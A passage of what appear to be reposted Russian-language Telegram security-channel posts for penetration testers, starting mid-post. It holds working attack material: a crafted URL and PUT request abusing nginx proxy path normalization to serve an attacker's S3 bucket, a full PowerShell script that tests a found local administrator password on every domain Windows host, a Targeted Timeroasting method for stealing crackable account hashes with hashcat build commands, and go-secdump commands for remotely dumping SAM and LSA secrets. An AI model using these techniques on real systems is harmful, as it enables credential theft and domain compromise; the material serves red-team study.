    rewrite ^(.*)$ /$s3_name$1 break;
         
    proxy_pass https://$s3_host;
Но даже в данном случае конфигурация будет уязвима из-за разницы обработок переданного пути. Правило location и rewrite работают с нормализованным путем, а proxy_pass, в котором указан URI без пути, отправит ненормализованное значение. Таким образом для эксплуатации уязвимости необходимо отправить запрос, который в нормализованном виде попадет в location /static/, но будет начинаться с бакета, который контролирует атакующий.
http://example.tld/attacker-bucket/..%2Fstatic/foo%0Abar
=
https://storage.yandexcloud.net/attacker-bucket/..%2Fstatic/foo%0Abar
Как и в прошлом примере наличие в имени объекта символов %0A и /../ не помешают эксплуатации, так как это не файловая система и такой объект можно создать PUT запросом. Также, если вы планируете искать подобные мисконфиги блэкбоксом, то нужно учитывать, что ошибки NoSuchObject и NoSuchBucket часто заменяют на дефолтную страницу 404, что может помешать. Обойти это можно вызывая ошибки с кодом, отличным от 404, например отправляя PUT запрос без указания Content-Length.
PUT /attacker-bucket/..%2Fstatic/foo%0Abar HTTP/1.1
Host: example.tld
Connection: close

Repost from GISCYBERTEAM
⚠️ Уязвимость 7-Zip, позволяющая обойти механизм защиты Windows 22 января был опубликован публичный Proof-of-Concept (PoC) для эксплуатации уязвимости CVE-2025-0411. Данная уязвимость позволяет обойти защитный механизм Windows, известный как Mark-of-the-Web (MOTW).
Mark-of-the-Web (MOTW) — это механизм защиты, встроенный в Windows и некоторые программы Microsoft, который помогает защитить пользователей от потенциально небезопасного контента, загружаемого из интернета. Он добавляет специальный флаг (метаданные) к файлам, загруженным из внешних источников, чтобы операционная система и приложения знали, что файл был получен из недоверенного источника.
Как работает Mark-of-the-Web? Когда файл (например, документ, исполняемый файл или архив) загружается из интернета с помощью браузера или другой программы, Windows добавляет специальный заголовок в метаданные файла. Этот заголовок сохраняется в виде альтернативного потока данных (Alternate Data Stream), который поддерживается файловой системой NTFS. Например, для файла, загруженного из интернета, MOTW добавляется в виде строки:
[ZoneTransfer]
ZoneId=3
Значение ZoneId определяет источник файла: ZoneId=0: Мой компьютер (локальная зона, безопасная). ZoneId=1: Локальная интрасеть. ZoneId=2: Доверенные сайты. ZoneId=3: Интернет (недоверенная зона). ZoneId=4: Ограниченные сайты. Ссылка на публичный PoC: https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/62602/

Repost from CyberSecrets
Проверка локальных учетных записей Представим себе ситуацию, когда во время выполнения проекта мы обнаружили пароль от локаль
Проверка локальных учетных записей Представим себе ситуацию, когда во время выполнения проекта мы обнаружили пароль от локального администратора, например, в групповых политиках, или от другой локальной учетной записи. Нам необходимо проверить на каких хостах эта учетная запись есть и валидна. Если под рукой есть «nxc», то проблем нет, а если нет? Можно воспользоваться PowerShell и написать небольшой скрипт для проверки локальной учетной записи. Скрипт будет запрашивать в домене все активные хосты с операционной системой Windows и выполнять проверку локальной учетной записи. Метод, используемый в данном скрипте для новых версий Windows, основан на обработке ошибки, это связанно с механизмами безопасности внедренных в операционную систему. Ошибки, возникающие при правильном и неправильном пароле, разные. И на основании этого мы можем делать предположение когда пароль является верным. а когда нет.
function Check-LocalCredential{
    [CmdletBinding()]
    Param (
      [Parameter(Mandatory)]
      [string]
      $UserName,

      [Parameter(Mandatory)]
      [string]
      $Password
    )

    # Подключаем библиотеку для работы с учетными записями
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement -ErrorAction Stop

    # В качестве контекста используем машину
    $ContextType = [DirectoryServices.AccountManagement.ContextType]::Machine

    $searcher = [adsisearcher]'(&(objectCategory=computer)(operatingsystem=*windows*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 1000
    $comps=$searcher.FindAll()
   
    foreach($comp in $comps)
    {
        $ComputerName =  $comp.Properties.dnshostname.Item(0)
        
        try
        {
            $PrincipalContext = [System.DirectoryServices.AccountManagement.PrincipalContext]::new($ContextType, $ComputerName)
            # Проверям учетные данные
            if($PrincipalContext.ValidateCredentials($UserName,$Password))
            {
                Write-Host -ForegroundColor Green "[+] User $UserName has password $Password on computer $ComputerName"
            }
        }
        catch [UnauthorizedAccessException]
        {
        Write-Host -ForegroundColor Yellow "[*] User $UserName has password $Password on computer $ComputerName"
        continue
        }
        catch 
        {
            #Write-host -ForegroundColor Red "[!] Error  $_.Exception.Message "
            continue
        }
    }
}  
Запускаем
Check-LocalCredential -Username Administrator -Password Qwerty123 
Зеленый цвет вывода так же покажет, что учетная запись, от имени которой запускается скрипт, является локальным администратором на проверяемом хосте, желтый - пароль для локальной учетной записи верный. Стоит помнить, что скрипт проверяет валидность учетных данных, но не показывает членство в группе локальных администраторов. #Powershell #Внутрянка

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from RedTeam brazzers
Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею. В двух словах, что такое атака Timeroasting - Это атака, позволяющая получить хеш пароля машинной учетной записи. В целом, мы знаем, что это для нас бесполезно, т.к. пароль машины чаще всего очень длинный и сложный. Но есть сценарии, когда пароль все таки бывает простой и, в совокупности с атакой pre2k, можно построить интересный вектор. Об этом в своем блоге недавно писал @snovvcrash. Суть атаки Targeted Timeroasting немного в другом: если у нас есть права GenericWrite на объект пользователя, то мы можем превратить этого пользователя в компьютер (что?) и запросить хеш для него. Превратить пользователя в компьютер можно двумя простыми шагами: 1. Меняем userAccountControl на 4096 (UF_WORKSTATION_TRUST_ACCOUNT) 2. Переименовываем sAMAccountName в тоже имя, но со знаком $ на конце После этих действий сервис времени будет уверен, что это теперь компьютер и отдаст вам хеш. Хорошо, как можно это использовать? 1 Сценарий. У нас есть права Domain Admins и не хочется шуметь с помощью атаки DcSync, тогда можно запустить Targeted Timeroasting на всех пользователей и вы получите хеши учеток, которые потом надо будет еще сбрутать. 2 Сценарий. Захватили учетку HelpDesk. Чаще всего у этой учетки есть права GenericWrite на половину домена. CA в домене нет, значит не провести атаку Shadow Creds. Проведя атаки Targeted Kerberoasting или Targeted AsReproasting мы получим билеты, которые нет возможности побрутить по большим словарям. А с помощью атаки Targeted Timeroasting мы, во-первых, не сильно нашумим на SIEM (не факт, конечно), а во-вторых, получим хеши, которые можно перебирать с чудовещной скоростью. Остальные сценарии придумайте сами :) Свежий ресерч про эту атаку вы можете прочитать в блоге. Брутить хеши на hashcat можно так:
git clone https://github.com/hashcat/hashcat && cd hashcat
git checkout 5236f3bd7 && make
./hashcat -m31300
Для атаки Targeted Timeroasting был разработан PowerShell скрипт. Но сегодня я переписал атаку на Python и выложил у себя в репозитории: https://github.com/PShlyundin/TimeSync Назвал инструмент TimeSync, потому что мне эта атака очень напомнила классический DcSync.

Repost from GISCYBERTEAM
Добрый день, уважаемые подписчики! В сегодняшней статье мы с Вами рассмотрим атаку на беспроводные сети Wi-Fi типа Evil Twin, осуществляемую через поддельный портал авторизации с целью похищения данных. Актуальность данного материала обусловлена недостаточным качеством документации по инструментам, таким как eaphammer, которые позволяют проводить подобные атаки. https://teletype.in/@giscyberteam/captive_portal #WiFi #SocialEngineering

Repost from AppSec Journey
Кстати, вполне интересная схема про применение принципов нулевого доверия в рамках тестирования. Интересная она тем, что она практически базируется на принципах Secure by Design, что в целом забавно)) вообще, делать все как надо сразу - может и есть рецепт успеха?

Repost from Pentest HaT
🔄🖼️ go-secdump v0.4.0 Инструмент для удалённого копирования 🏠 Windows секретов (SAM, LSA) без сохранения на диск Добавлено
🔄🖼️ go-secdump v0.4.0 Инструмент для удалённого копирования 🏠 Windows секретов (SAM, LSA) без сохранения на диск Добавлено:
Added calculation of Kerberos AES Keys for the machine account password. Could be useful when NTLM auth is disabled
Пример: ./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2 Relay: ./go-secdump --host 192.168.0.100 -n --relay Основные опции:
--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>
💻 Home 💻 Download #soft #golang #redteam #gosecdump ✈️ Pentest HaT

🔗Ссылка: https://opennet.ru/62594/